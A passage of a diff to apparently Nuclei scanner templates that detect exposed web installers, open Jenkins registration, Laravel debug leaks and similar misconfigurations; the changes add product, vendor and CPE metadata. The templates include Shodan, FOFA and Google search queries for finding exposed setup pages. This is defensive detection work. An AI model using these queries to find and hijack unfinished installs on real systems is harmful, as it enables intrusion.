b/http/misconfiguration/installer/subrion-installer.yaml index 56461fe750..e7c5886539 100644 --- a/http/misconfiguration/installer/subrion-installer.yaml +++ b/http/misconfiguration/installer/subrion-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="Subrion CMS Web Installer" + product: subrion + vendor: intelliants tags: subrion,cms,install,misconfig + classification: + cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml index d5841e1212..996a7ddb96 100644 --- a/http/misconfiguration/installer/sugarcrm-install.yaml +++ b/http/misconfiguration/installer/sugarcrm-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Sugar Setup Wizard" + product: sugarcrm + vendor: sugarcrm tags: misconfig,sugar,sugarcrm,install + classification: + cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/suitecrm-installer.yaml b/http/misconfiguration/installer/suitecrm-installer.yaml index d27d8d7fe7..5aebcf0511 100644 --- a/http/misconfiguration/installer/suitecrm-installer.yaml +++ b/http/misconfiguration/installer/suitecrm-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"SuiteCRM" + product: suitecrm + vendor: salesagility tags: misconfig,suitecrm,install + classification: + cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index 30f8caa296..0077e8d9c6 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Tasmota" + product: tasmota + vendor: tasmota_project tags: misconfig,tasmota,install,exposure + classification: + cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml index adb01864c8..711dd56277 100644 --- a/http/misconfiguration/installer/tastyigniter-installer.yaml +++ b/http/misconfiguration/installer/tastyigniter-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="TastyIgniter - Setup - License agreement" + product: tastyigniter + vendor: tastyigniter tags: misconfig,install,exposure,tastyigniter + classification: + cpe: cpe:2.3:a:tastyigniter:tastyigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/tautulli-install.yaml b/http/misconfiguration/installer/tautulli-install.yaml index 72331e446a..e40383362d 100644 --- a/http/misconfiguration/installer/tautulli-install.yaml +++ b/http/misconfiguration/installer/tautulli-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Tautulli - Welcome" + product: tautulli + vendor: tautulli tags: misconfig,tautulli,install + classification: + cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index 9fbd9a6657..d342672e85 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"TestRail Installation Wizard" + product: testrail + vendor: gurock tags: misconfig,testrail,install,exposure + classification: + cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/tiny-rss-installer.yaml b/http/misconfiguration/installer/tiny-rss-installer.yaml index 57a77d9ca2..9bab296958 100644 --- a/http/misconfiguration/installer/tiny-rss-installer.yaml +++ b/http/misconfiguration/installer/tiny-rss-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Tiny Tiny RSS - Installer" + product: tiny_tiny_rss + vendor: tt-rss tags: misconfig,tiny,install + classification: + cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/typo3-installer.yaml b/http/misconfiguration/installer/typo3-installer.yaml index a8d5d57601..e3332ee2b9 100644 --- a/http/misconfiguration/installer/typo3-installer.yaml +++ b/http/misconfiguration/installer/typo3-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Installing TYPO3 CMS" + product: typo3 + vendor: typo3 tags: misconfig,typo3,install + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/umbraco-installer.yaml b/http/misconfiguration/installer/umbraco-installer.yaml index b238bc4b0c..e4fafb4c22 100644 --- a/http/misconfiguration/installer/umbraco-installer.yaml +++ b/http/misconfiguration/installer/umbraco-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Install Umbraco" + product: umbraco_cms + vendor: umbraco tags: misconfig,umbraco,install,oss + classification: + cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 4551f83ede..8ce531700d 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" + product: uvdesk + vendor: webkul tags: misconfig,uvdesk,install,exposure + classification: + cpe: cpe:2.3:a:webkul:uvdesk:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index a5ea646dff..d8d4f1a88d 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to Vtiger CRM" + product: vtiger_crm + vendor: vtiger tags: misconfig,vtiger,install,exposure + classification: + cpe: cpe:2.3:a:vtiger:vtiger_crm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/webcalendar-install.yaml b/http/misconfiguration/installer/webcalendar-install.yaml index c45245cbec..9f66521dd7 100644 --- a/http/misconfiguration/installer/webcalendar-install.yaml +++ b/http/misconfiguration/installer/webcalendar-install.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"WebCalendar Setup Wizard" fofa-query: title="WebCalendar Setup Wizard" + product: webcalendar + vendor: k5n tags: misconfig,webcalendar,install + classification: + cpe: cpe:2.3:a:k5n:webcalendar:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/webtrees-install.yaml b/http/misconfiguration/installer/webtrees-install.yaml index 60f36908c1..471ae52d4a 100644 --- a/http/misconfiguration/installer/webtrees-install.yaml +++ b/http/misconfiguration/installer/webtrees-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Setup wizard for webtrees" + product: webtrees + vendor: webtrees tags: misconfig,webtrees,install + classification: + cpe: cpe:2.3:a:webtrees:webtrees:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index f6026c5f08..2e33eda9a6 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Webuzo Installer" + product: webuzo + vendor: softaculous tags: misconfig,webuzo,install,exposure + classification: + cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index 17ee145d7b..99dd2867ca 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"Wiki.js Setup" + product: wiki.js + vendor: requarks tags: install,wiki-js,exposure,misconfig + classification: + cpe: cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml index 9a5b3eb9f6..53dcf1873e 100644 --- a/http/misconfiguration/installer/wowonder-installer.yaml +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="WoWonder | Installation" + product: wowonder + vendor: wowonder tags: misconfig,install,exposure,wowonder + classification: + cpe: cpe:2.3:a:wowonder:wowonder:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml index f07cdce46b..6070b36b92 100644 --- a/http/misconfiguration/installer/yzmcms-installer.yaml +++ b/http/misconfiguration/installer/yzmcms-installer.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"YzmCMS" fofa-query: title="YzmCMS" + product: yzmcms + vendor: yzmcms tags: misconfig,yzmcms,install,exposure + classification: + cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml index dfc9451882..be2faeda57 100644 --- a/http/misconfiguration/installer/zencart-installer.yaml +++ b/http/misconfiguration/installer/zencart-installer.yaml @@ -12,8 +12,12 @@ info: max-request: 1 shodan-query: html:"shopping cart program by zen cart" fofa-query: title="Installer" && icon_hash="899320116" + product: zen_cart + vendor: zen-cart tags: misconfig,zencart,install,exposure + classification: + cpe: cpe:2.3:a:zen-cart:zen_cart:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index 204f24adf3..3ca7fc8dca 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H cvss-score: 9.4 cwe-id: CWE-284 + cpe: cpe:2.3:a:zenphoto:zenphoto:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: title:"Zenphoto install" + product: zenphoto + vendor: zenphoto tags: misconfig,panel,zenphoto,setup,installer http: @@ -29,4 +32,4 @@ http: part: body words: - Welcome to Zenphoto! This page will set up Zenphoto -# digest: 4a0a004730450220629b5aaff25239d9961f3fede15984202268329e4563d84f33d4effb2a7bddcc0221009d4e4b8bd14612cc456660fad9260decbbc802445317994cdf4ef2ca5f17da97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220629b5aaff25239d9961f3fede15984202268329e4563d84f33d4effb2a7bddcc0221009d4e4b8bd14612cc456660fad9260decbbc802445317994cdf4ef2ca5f17da97:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/jaeger-ui-dashboard.yaml b/http/misconfiguration/jaeger-ui-dashboard.yaml index fbf3671f04..47053eded9 100644 --- a/http/misconfiguration/jaeger-ui-dashboard.yaml +++ b/http/misconfiguration/jaeger-ui-dashboard.yaml @@ -11,8 +11,12 @@ info: max-request: 1 verified: true shodan-query: http.title:"Jaeger UI" + product: jaeger_ui + vendor: jaegertracing tags: misconfig + classification: + cpe: cpe:2.3:a:jaegertracing:jaeger_ui:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: group: 1 regex: - '(?i)"gitVersion":\s*"([a-z0-9.]+)"' -# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/jboss-status.yaml b/http/misconfiguration/jboss-status.yaml index f343b62bd9..b72f6e4f4a 100644 --- a/http/misconfiguration/jboss-status.yaml +++ b/http/misconfiguration/jboss-status.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true + product: jboss_enterprise_application_platform + vendor: redhat tags: jboss,unauth,edb,misconfig http: diff --git a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml index fa80046ff9..004b9bed0b 100644 --- a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml +++ b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: "X-Jenkins" + product: jenkins + vendor: jenkins tags: misconfig,jenkins,apache,tomcat + classification: + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index 927cdc8521..443a8766a5 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"contexts known to this" + product: jetty + vendor: eclipse tags: jetty,misconfig + classification: + cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 404 -# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml index f242cad395..0abb93a568 100644 --- a/http/misconfiguration/jupyter-notebooks-exposed.yaml +++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: title:"Home Page - Select or create a notebook" + product: notebook + vendor: jupyter tags: jupyter,misconfig + classification: + cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - 'Home Page - Select or create a notebook' - '
There are no notebooks running.
' condition: or -# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index 60c24eace7..aadd0500de 100644 --- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:Kube-state-metrics + product: kube-state-metrics + vendor: kubernetes tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes + classification: + cpe: cpe:2.3:a:kubernetes:kube-state-metrics:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml index 032f916e24..a7e88041d2 100644 --- a/http/misconfiguration/label-studio-signup.yaml +++ b/http/misconfiguration/label-studio-signup.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1649949475 + product: label_studio + vendor: heartex tags: label-studio,sign-up,misconfig + classification: + cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* http: - raw: - | @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/laravel-debug-infoleak.yaml b/http/misconfiguration/laravel-debug-infoleak.yaml index 2f753ef9a7..125e6bd8a9 100644 --- a/http/misconfiguration/laravel-debug-infoleak.yaml +++ b/http/misconfiguration/laravel-debug-infoleak.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cwe-id: CWE-215 + cpe: cpe:2.3:a:laravel:framework:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: Laravel-Framework fofa-query: app="Laravel-Framework" + product: framework + vendor: laravel tags: misconfig,laravel,debug,infoleak http: diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 97fb969141..f84cdd4df5 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Libvirt" + product: libvirt + vendor: redhat tags: libvirt,exposure,debug,misconfig + classification: + cpe: cpe:2.3:a:redhat:libvirt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index c004af09a8..1ab70b5ca0 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ 